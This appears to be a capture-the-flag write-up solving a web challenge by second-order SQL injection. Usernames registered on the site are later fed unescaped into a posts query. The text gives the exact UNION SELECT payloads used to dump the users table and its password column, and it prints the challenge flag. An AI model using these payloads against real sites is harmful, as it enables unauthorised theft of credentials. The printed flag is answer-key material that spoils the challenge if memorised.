Website allows you to register an account then login.

So try creating the user
  '

then login to see the following SQL error
	There Was An Error With Your Request
	select id, user, post from posts where user = ''';

The select statement is thus injectable and you can probably guess there's
a users table, so try and dump the user database by creating the user
  ' UNION SELECT user,user,user from users where '1'='1

then login to see the user admin show up in the posts.

Guess the password field name as pass, and then create the following user:
  ' UNION SELECT user,pass,pass from users where '1'='1

then login to see flag
  flag{union?_why_not_onion_513b106578792f5ef8053943cdde00d2}

